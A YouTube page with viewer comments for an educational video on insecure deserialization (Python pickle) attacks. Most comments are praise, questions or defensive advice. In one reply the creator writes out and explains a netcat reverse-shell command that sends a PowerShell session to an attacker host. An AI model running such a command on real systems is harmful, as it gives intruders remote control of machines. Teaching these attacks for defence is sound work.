Insecure Deserialization Attack Explained

แชร์
ฝัง
  • เผยแพร่เมื่อ 1 ต.ค. 2024
  • #Deserialization #WebSecurity
    We'll explore the basic concepts of an Insecure Deserialization by attacking a web app written in Python.
    🐤 Twitter: / pwnfunction
    🎵 Track: Warriyo - Mortals (feat. Laura Brehm)
    NCS link: • Warriyo - Mortals (fea...

ความคิดเห็น • 243

  • @PwnFunction
    @PwnFunction  3 ปีที่แล้ว +213

    eyJtZXNzYWdlIjoiaGVsbG8gdGltZSB3YXN0ZXIsIHdlbGNvbWUgdG8gdGhlIGNsdWIuIiwgInNlY3JldCI6Imh0dHBzOi8vYml0Lmx5LzNqc1BxUXoifQ==

    • @pwndumb2903
      @pwndumb2903 3 ปีที่แล้ว +3

      Cool

    • @mrhappysmiley2968
      @mrhappysmiley2968 3 ปีที่แล้ว +35

      I hate you

    • @RnVjayBZb3V0dWJl
      @RnVjayBZb3V0dWJl 3 ปีที่แล้ว +23

      Well that was mean! xD But i like it ;)

    • @anushmanglani5979
      @anushmanglani5979 3 ปีที่แล้ว +4

      Smart Ass!!
      BTW: how can you italicize the python keywords in VSCode?

    • @sodiboo
      @sodiboo 3 ปีที่แล้ว +28

      Can’t copy youtube comments on mobile :(
      But i recognize the ey, that’s JSON!

  • @fr0mage
    @fr0mage 3 ปีที่แล้ว +167

    Amazing video! It would be great if you could also include a small section at the end on how to defend against these vulnerabilities for the blue team people out there :D

    • @PwnFunction
      @PwnFunction  3 ปีที่แล้ว +67

      Noted

    • @shivaganesh6939
      @shivaganesh6939 3 ปีที่แล้ว

      Yes it is....

    • @mabakalox2353
      @mabakalox2353 3 ปีที่แล้ว +11

      The simple way to defend against such attack is to check cookie string at first place, that this cookie was created by your server, before calling serializer. I mean Digital signature at cookie.

    • @dacid44
      @dacid44 3 ปีที่แล้ว +16

      Certain serialization methods are also more secure than others. For example, don't use pickle. It literally has a huge warning at the top of it's documentation saying not to use it to (de)serialize untrusted data. Other forms like JSON are more secure (though check documentation for whichever library you might want to use to be sure.) This can still depend on your implementation though. JSON isn't secure just because it's JSON, if you write a deserializer that generates and runs code from the JSON, that could still be a vulnerability.

    • @hilligans1
      @hilligans1 3 ปีที่แล้ว +1

      @@dacid44 just write the serialization and deserialization yourself with two methods. Boom easy

  • @wnathanielw
    @wnathanielw 3 ปีที่แล้ว +223

    This channel is so underrated

    • @loanqypol6797
      @loanqypol6797 3 ปีที่แล้ว +5

      completely, i just discovered it, the end music is perfect

    • @Fadhilx
      @Fadhilx 3 ปีที่แล้ว +2

      @@loanqypol6797 agreed

    • @thatguy5277
      @thatguy5277 3 ปีที่แล้ว +2

      It's a programming channel
      No matter how good it is, most people are sadly extremely bored by programming content

    • @darknessandbelow.4640
      @darknessandbelow.4640 3 ปีที่แล้ว +2

      @@thatguy5277 In fact, Programming is actually so enjoyable if u wish to learn it.

  • @smiley_1000
    @smiley_1000 3 ปีที่แล้ว +5

    I don't see how python is particularly vulnerable to this. You using an insecure package is not the languages fault.

    • @alagaika8515
      @alagaika8515 3 ปีที่แล้ว +6

      Especially if the documentation of the package screams THIS IS INSECURE! DO NOT USE WITH UNTRUSTED INPUTS

    • @lismanrazvan5783
      @lismanrazvan5783 2 ปีที่แล้ว +2

      it's about the concept...

  • @MrMrCraftmine
    @MrMrCraftmine 3 ปีที่แล้ว +3

    So normally the client would send a pickled + base64 encoded session object to the server? That means there should be Python running on the Client Browser? This is the easiest security hole to stuff, just don't use pickles. Use JSON or XML instead.

    • @seroamado6283
      @seroamado6283 2 ปีที่แล้ว +1

      youre right, I didn't even know someone would actually restore objects in this way.

  • @rishabhtiwari6641
    @rishabhtiwari6641 3 ปีที่แล้ว +48

    Just imagine if this guy creates his own course. That would be crazy.

    • @mr.rabbit5642
      @mr.rabbit5642 ปีที่แล้ว

      Is that sarcastic or there truly aren't any? :((

  • @batatakhizou4509
    @batatakhizou4509 3 ปีที่แล้ว +15

    One of the best tutorials channel out there, MADE RESPECT TO YOU

    • @felixw8004
      @felixw8004 2 ปีที่แล้ว

      made respect. yeah-...

  • @idan4329
    @idan4329 3 ปีที่แล้ว +2

    I don't get the web exploit:
    1.Does the server must have python installed or is this some kind of a asm shellcode?
    2.You didn't show the deserialization code on the server
    3.How can one distinct between local effects and remote successful rce?

  • @telnobynoyator_6183
    @telnobynoyator_6183 3 ปีที่แล้ว +3

    came for the penguin profile pic, stayed for the awesome content

  • @RnVjayBZb3V0dWJl
    @RnVjayBZb3V0dWJl 3 ปีที่แล้ว +8

    I found your channel earlier today when trying to search for anyone explaining the difference between XSS in HTML and XSS in json requests. Haven't had the luck but saw your XSS video. Loved it a lot and shared it with my co-workers! Trying to advance myself in web application pentesting and understand everything. It's rare to see people explain in a good way and even get things drawn graphically in front of you. It helps a lot so thank you!
    I've been working with this for about a year from being freshly new from university. All you learn is mostly the theoretical part and not the practical. What i've recently noticed is that i lack the knowledge in HTML to be able to perform and really understand XSSes. So i have also been on the look out to create a web application and use some HTML to really understand JavaScript.
    p.s Just got myself two 1TB M2 SSD for my Raspian :P Already have pi-hole installed and will now fiddle with creating an OpenMediaVault to create my own NAS. Hoping by fiddling with stuff like this, will give me more knowledge in actual hacking and understanding it all. Will be fun! Love your videos! have only seen two of them. Saving the rest for the weekend. Good job with them all and greetings from Sweden! :P

    • @PwnFunction
      @PwnFunction  3 ปีที่แล้ว +3

      I very much appreciate comments like these, thanks.
      Also I do think it's necessary for one to learn HTML and Javascript to understand XSS on a fundamental level.

  • @MadlipzMarathi
    @MadlipzMarathi 3 ปีที่แล้ว +2

    If you Deserialization object with verificarion is your fault not pythons , This can be done with any Language, nice video btw.

  • @ratulhasan7136
    @ratulhasan7136 2 ปีที่แล้ว +1

    Quick question: how did python code run in the server? Is it converted to ASM or some global language?

  • @mukulgaut
    @mukulgaut 3 ปีที่แล้ว +6

    Just one word PERFECT

    • @PwnFunction
      @PwnFunction  3 ปีที่แล้ว +4

      🙏

    • @ifelseprog
      @ifelseprog 3 ปีที่แล้ว

      @@PwnFunction 🙏

    • @NightDragonPlayz_2
      @NightDragonPlayz_2 3 ปีที่แล้ว +1

      @@ifelseprog
      SO PERFECT
      function subscribe2PWN()
      Redirection.load = subscribe
      Site.function.load = www.youtube.com
      (Not real html js)

  • @marlon582
    @marlon582 3 ปีที่แล้ว +22

    Your timing with these videos is pretty good! When I finished a challenge about Server-Side Template Injections you uploaded the video about SSTIs. And today I finished a challenge about Deserialization Attacks and now you uploaded this! Haha, keep it going man :)

    • @PwnFunction
      @PwnFunction  3 ปีที่แล้ว +30

      I can see the future because your computer is my computer.

    • @coder_rc
      @coder_rc 3 ปีที่แล้ว +1

      @@PwnFunction 😂😂

    • @karthibalaji3817
      @karthibalaji3817 3 ปีที่แล้ว +2

      😂

  • @Maric18
    @Maric18 3 ปีที่แล้ว +1

    who in their right mind just unpickles random data?

  • @ducky1681
    @ducky1681 2 ปีที่แล้ว +1

    Most disturbing part of this is that the server runs windows(or at least powershell).

  • @prog_demos
    @prog_demos 3 ปีที่แล้ว +3

    You're doing an amazing job. I have no idea why you don't have like 2 mil subs. I'm sure that in like a year or two we'll be there as well.
    Greetings from a fellow Gen Z-er from Croatia

  • @venkateshpandian7239
    @venkateshpandian7239 3 ปีที่แล้ว +2

    I have a request dear brother/mentor. You are posting really good stuff here 😊 big congratulations for that 😊👍. We need a complete course from you covering all the basics to advanced of hacking... So that it is helpful for lots of new comers like me. 😊👍 Hope you consider this !!!!

  • @reyaaoki
    @reyaaoki 3 ปีที่แล้ว +1

    and that's why you should always sign this kind of stuff

  • @Omar-wm9kz
    @Omar-wm9kz 3 ปีที่แล้ว +3

    the only teachers which i like Pwn for these awesome videos and net-ninja for explainning java script and web technologies.

  • @musicforalifetime133
    @musicforalifetime133 3 ปีที่แล้ว +1

    what font do you use for terminal?

  • @hidayatbachtar
    @hidayatbachtar 2 ปีที่แล้ว

    so Insecure deserialize have 2 category?
    - binary
    - Web Application?
    thats right?

  • @_DeProgrammer
    @_DeProgrammer 3 ปีที่แล้ว +3

    great video! Got a ton out of this! Thank you so much for all your amazing content!

  • @loradawn
    @loradawn 3 ปีที่แล้ว +1

    Not only that your explanations are great, but you got a huge talent to draw/sketch, so you should change the hobby... (just kidding). :)

  • @fxiqval
    @fxiqval ปีที่แล้ว

    i know this is old, but my question is, why the f!ck does python serialize methods? can't it have just a class that you then initialize like a struct in C(++) somehow (not familiar with python) with only the member variables and the methods will be stored only in your code?

  • @btmg4828
    @btmg4828 3 ปีที่แล้ว +1

    how about to Link the Stackoverflow post?

    • @btmg4828
      @btmg4828 3 ปีที่แล้ว +1

      stackoverflow.com/questions/19855156/whats-the-exact-usage-of-reduce-in-pickler

  • @abdessalam8468
    @abdessalam8468 3 ปีที่แล้ว +1

    Thank you
    Please , api attack

  • @eduardoandrescastilloperer4810
    @eduardoandrescastilloperer4810 8 หลายเดือนก่อน

    As Patrick star once said:
    I’ve come for your pickle!!!

  • @draklowell
    @draklowell 2 ปีที่แล้ว

    Who uses pickle for serialization/deserialization on production?

  • @alperkaya8919
    @alperkaya8919 2 ปีที่แล้ว

    Basically, creator of the website trusts that you have given valid inputs instead of they checking your inputs.

  • @ammaarshamail
    @ammaarshamail 3 ปีที่แล้ว +1

    amazingly i understood every bit of it...Thanks..it means alot!!!

  • @mr.rabbit5642
    @mr.rabbit5642 ปีที่แล้ว

    Is 490 some joke of "XD" or was it actually 2020? :D

  • @DEADCODE_
    @DEADCODE_ ปีที่แล้ว

    I swear Dude you're fuckin' genius Allah bless you

  • @skibo4302
    @skibo4302 3 ปีที่แล้ว

    Absolutely Beautiful!

  • @maulikshah28
    @maulikshah28 3 ปีที่แล้ว +1

    Veautiful video man
    You deserve the like and subscribe

  • @fabiorj2008
    @fabiorj2008 2 ปีที่แล้ว

    Hi , amazing video. Its possible let the app available to download in a docker environment ?

  • @ForeverMan
    @ForeverMan 2 ปีที่แล้ว

    _lets write insecure code and show it's flawed_
    C'mon, who writes that?

  • @Vazzible_gaming
    @Vazzible_gaming 6 หลายเดือนก่อน

    I have a good idea for you, might I suggest you try giving us some QNA notes or questions at the beginning of each video, giving us the necessary question, and then you go onto answer the questions in depth in the rest of the video.

  • @avilde
    @avilde 2 ปีที่แล้ว +1

    Well done with ilustrations and quite a good explanation. Definetely would be useful to also hear how to defend against such attacks )

  • @vxqr2788
    @vxqr2788 3 ปีที่แล้ว

    I have nothing to add, but to support this channel I will leave a comment.

  • @tbc...
    @tbc... 2 ปีที่แล้ว

    What is the typography you're using on your vscode instance?

  • @king_tv4
    @king_tv4 2 ปีที่แล้ว

    What software do you use for your screen explanation

  • @berkaybakacak
    @berkaybakacak 3 ปีที่แล้ว

    Is this vulnerability still exists in Django?

  • @tarankaranth8782
    @tarankaranth8782 2 ปีที่แล้ว

    one question, wouldnt this be an issue for all the existing restapi code we have,?

  • @janwrona9539
    @janwrona9539 ปีที่แล้ว

    Great explanation of what de/serialization is !

  • @天馬-u6f
    @天馬-u6f 2 ปีที่แล้ว

    even json deserialization is enough to break your machine. i see no reason to use pickle unless it is encrypted after serialization

  • @lerooyferr3725
    @lerooyferr3725 3 ปีที่แล้ว

    really cool and easy to understand. Agree @NathanielWard

  • @iusegentoobtw
    @iusegentoobtw 3 ปีที่แล้ว +1

    pretty sure he's using Operator Mono as a font.
    $150 flex lmao

    • @iusegentoobtw
      @iusegentoobtw 3 ปีที่แล้ว +1

      If you like seeing cursive in a monospace font, definitely give Victor Mono a try. It's a great free alternative. It also has a fair amount of ligatures supported and is quite stylish. Personally I use it in my code editor to stunt on tasteless peasants.

  • @namonaite
    @namonaite 3 ปีที่แล้ว

    Yeah cyberpunk do look like that xD.

  • @eccentricOrange
    @eccentricOrange 2 ปีที่แล้ว +1

    1:04 I love how you took a moment there and then actually estimate "5 hours or so" as though it was meant to be precise :D

  • @last8exile
    @last8exile 2 ปีที่แล้ว

    WTF with this language? It serializes method bodies of objects? That's BS.
    Why would you ever do that? It is the same as someone upload to your server a sting of code to execute.
    Serialisation and deserialisation must be used only for data in objects (and this still have vulnerabilities)

    • @TravisTev
      @TravisTev 2 ปีที่แล้ว

      It does not serialize actual methods, but it does serialize the tuple returned by the __reduce__ method, the first item of which is taken as the name an object that the deserializer calls, expecting it to return an initial version of the serialized object to be reconstructed. This call can be to any bound function in memory at the time of deserialization, which is what allows the exploit.
      The pickle serializer was never intended to be used with untrusted data, certainly not from a user cookie in a web application. The pickle module documentation conspicuously warns about this.

  • @joopie46614
    @joopie46614 3 ปีที่แล้ว +1

    imagine a noob friendly, new and popular language having an exploit such as this

    • @someonerandom9939
      @someonerandom9939 3 ปีที่แล้ว +1

      It's not a problem with the language, its the serialization library that has the exploit. It even outright tells you not to use it for anything untrusted.
      Not even the most security careless developers would use this kind of serialization in such a way so I'm not sure why this video was made.

    • @joopie46614
      @joopie46614 3 ปีที่แล้ว +1

      @@someonerandom9939 ah that's some good context the video maker should've included, thanks

  • @jamisonmartino1136
    @jamisonmartino1136 3 ปีที่แล้ว +1

    Your vids are amazing, thanks so much!

  • @antimatter6728
    @antimatter6728 3 ปีที่แล้ว

    How do i know that the website has the vulnerability

  • @specowos
    @specowos 3 ปีที่แล้ว

    binary from title says "FU" lol

  • @thecrazzxz3383
    @thecrazzxz3383 3 ปีที่แล้ว

    Wait, what is the source code of the webpage ?

  • @khalilbouzidi8432
    @khalilbouzidi8432 3 ปีที่แล้ว +1

    thanks a lot for this very educational content

  • @VigneshWaran-jr1if
    @VigneshWaran-jr1if 3 ปีที่แล้ว

    I got error on def __reduce__(self) in this line

  • @shaddy9648
    @shaddy9648 3 ปีที่แล้ว

    That Keeanu Reeves joke was funny man

  • @iftakharhussain
    @iftakharhussain 3 ปีที่แล้ว

    Are Django websites vaulnarable to this attack? If so, how can it be prevented?

    • @debug9424
      @debug9424 3 ปีที่แล้ว +1

      Nothing that doesn't use pickle is vulnerable to this
      Pickle is not a normal (de)serialiser, it's an unsafe one, by design. It's made for a completely different use-case.
      The python documentation on pickle is full of warnings about using it on untrusted data.
      Most webapps use safe (de)serialisers and formats, like python's builtin 'json' module for the json format

  • @ukaszkiepas57
    @ukaszkiepas57 3 หลายเดือนก่อน

    thank you !!!! Awesome !!!

  • @igu642
    @igu642 2 ปีที่แล้ว

    You awesome thank you

  • @geigerflo37
    @geigerflo37 3 ปีที่แล้ว +1

    Your video quality is insane!

  • @gerardosuarez9051
    @gerardosuarez9051 2 ปีที่แล้ว

    what is your font in visual studio?

  • @Yaxqb
    @Yaxqb 2 ปีที่แล้ว

    Lession learned, just use json instead

  • @adityyyaaa
    @adityyyaaa 2 หลายเดือนก่อน

    you hyped me up for cybersec

  • @jamesrosemary2932
    @jamesrosemary2932 2 ปีที่แล้ว

    Never, ever trust user-supplied data.

  • @patrickslomian7423
    @patrickslomian7423 3 ปีที่แล้ว

    Maan ! Love your videos !

  • @Manabender
    @Manabender 3 ปีที่แล้ว

    How come the base-64-encoded cookie has a run of AAAAAAAA in it? Is the cookie screaming? Does it need help? *Should I be concerned!?*
    (but no really why is that there?)

    • @cmyk8964
      @cmyk8964 3 ปีที่แล้ว

      In Base64, the letter “A” corresponds to the bits “000000”.

    • @Manabender
      @Manabender 3 ปีที่แล้ว +1

      @@cmyk8964 So, long runs of zeroes get converted into A's. Or, emptiness gets converted into screaming. Sounds like midlife crisis.

  • @thesmartguy3523
    @thesmartguy3523 3 ปีที่แล้ว +1

    Quality content like this is what is needed more. Kudos to you mate - waiting for more.

  • @lisannasil2346
    @lisannasil2346 6 หลายเดือนก่อน

    you're a legend!

  • @ogwokwilliam3891
    @ogwokwilliam3891 3 ปีที่แล้ว

    Wowww the intro is killer

  • @tarankaranth8782
    @tarankaranth8782 2 ปีที่แล้ว

    awesome presentation.

  • @galitan5881
    @galitan5881 3 ปีที่แล้ว

    I didnt see comin, it was so fast !!!

  • @sajidali-hs4vv
    @sajidali-hs4vv ปีที่แล้ว

    каждый раз 10% это здорово спасибо за связки

  • @aphelioschenik3162
    @aphelioschenik3162 2 ปีที่แล้ว

    Yo i have a question ! Is Laravel safe against these type of attacks ? Compared to Django witch is using python ( a prototyped style of OOP) it's possible to inject some functions in session cookie and execute them using something like constructor, but for Laravel i think it's impossible to do the same thing, so please correct me if i m wrong , and thanks in advance.

  • @Pekatcho-y1d
    @Pekatcho-y1d 3 หลายเดือนก่อน

    amazing 🔥

  • @lordlenno6791
    @lordlenno6791 3 ปีที่แล้ว

    Did somebody know which musik playes in the backround
    PS: thanks for your great videos

  • @renify_
    @renify_ 3 ปีที่แล้ว

    this is same thing happen last year about Drupal8 CMS , serialization RCE

  • @Rene-tu3fc
    @Rene-tu3fc 3 ปีที่แล้ว

    it's pretty sad that people build systems that are actually this dumb. If I were to review a PR of an api that consumes a pickled object I'd make sure to close the PR instantly to make sure it doesn't get merged by others approving lol

  • @TheRetsekShow2236
    @TheRetsekShow2236 3 ปีที่แล้ว +1

    Great video!!

  • @karmavil4034
    @karmavil4034 3 ปีที่แล้ว

    I like science fiction. It's like in one of those movies!
    Although this might / might not serve as proof of concept, I cannot imagine who would install those tools on the web server, nor how you could run them. I cannot tell how that PS crap works but why not just listen? I like the sparkle of interest it arouses but keep it real.. the day I see you open a console on port 80 you will lose a subscriber

  • @gamesdean8620
    @gamesdean8620 3 ปีที่แล้ว

    I think K. Reeves is 491 in 2021. But the rest of the video is fine. Jokes apart, excellent as always

  • @hk3564
    @hk3564 2 ปีที่แล้ว

    That was lit

  • @dilawar_uchiha
    @dilawar_uchiha 3 ปีที่แล้ว

    I mean you have clear warnings in pickle docs, for a moment I thought you pulled it off as json

  • @VigneshWaran-jr1if
    @VigneshWaran-jr1if 3 ปีที่แล้ว

    Can you explain this command powershell.exe hacker.man

    • @PwnFunction
      @PwnFunction  3 ปีที่แล้ว +4

      ncat -e powershell.exe hacker.man 444
      ncat ➜ netcat by nmap.org
      -e ➜ execute command, in our case powershell.exe
      hacker.man ➜ domain
      4444 ➜ port
      The netcat will act as a client that interfaces between the program powershell.exe on the target and the attacker's server(hacker.man:4444), basically a shell via reverse connection.

    • @VigneshWaran-jr1if
      @VigneshWaran-jr1if 3 ปีที่แล้ว

      @@PwnFunction thank you so much

  • @coder_rc
    @coder_rc 3 ปีที่แล้ว +1

    As I said the best TH-camr of Indian web security community.
    If you don't know he is Indian!.

    • @sudhanshurajbhar9635
      @sudhanshurajbhar9635 3 ปีที่แล้ว +1

      Any references? I can't believe it 😅

    • @sudhanshurajbhar9635
      @sudhanshurajbhar9635 3 ปีที่แล้ว +1

      Ok i see now, from his intigriti profile

    • @coder_rc
      @coder_rc 3 ปีที่แล้ว +1

      @@sudhanshurajbhar9635 We are proud of him😎

    • @ChelGaming
      @ChelGaming 3 ปีที่แล้ว

      wow nice. his pronunciation is really good

  • @yagi_4048
    @yagi_4048 2 ปีที่แล้ว

    + 1 sub 👍

  • @khanhhnahk1
    @khanhhnahk1 ปีที่แล้ว

    Thank you so much for your explaination, cant find anywhere else better than yours, hope you can make a lot more videos related to web vulnerabilities :D

  • @malikashtar7216
    @malikashtar7216 3 ปีที่แล้ว

    Channels underrated but only one request would like mic volume to increase!!! 😍

  • @Thiscantbeanyone
    @Thiscantbeanyone ปีที่แล้ว

    This means the server should store cookies in python pickles, so that when reading pickled cookies to unpickle it, the bad code runs, this is a very specific situation, but its still a cool way to explain serialization and to say to not copy&paste random code into web compiler

  • @vaster1142
    @vaster1142 11 หลายเดือนก่อน

    .

  • @alexandros7832
    @alexandros7832 3 ปีที่แล้ว

    The gif of the person banging his head against the desk accurately sums up my pentesting career… love all your content btw

  • @jerrykhan9836
    @jerrykhan9836 3 ปีที่แล้ว

    Hey buddy 😕 what happens to your voice? Are you ok?

  • @lekenn2920
    @lekenn2920 3 ปีที่แล้ว

    XD: very satisfying shell

  • @annomy1493
    @annomy1493 3 ปีที่แล้ว

    Simple but great. Good work.

  • @casual_gamer987
    @casual_gamer987 3 ปีที่แล้ว

    I hit like button at your example of Serialization! Great video and explanation! Thanks

  • @saladking980
    @saladking980 3 ปีที่แล้ว

    Love your content, man! I'm curious about what you use to draw on screen? What software & hardware do you use for drawing?

  • @shinkaihuang6286
    @shinkaihuang6286 3 ปีที่แล้ว

    man it's so damn cool! please keep creating videos. you'll be successful

  • @mudassiralvi1
    @mudassiralvi1 3 ปีที่แล้ว

    Your videos are exceptional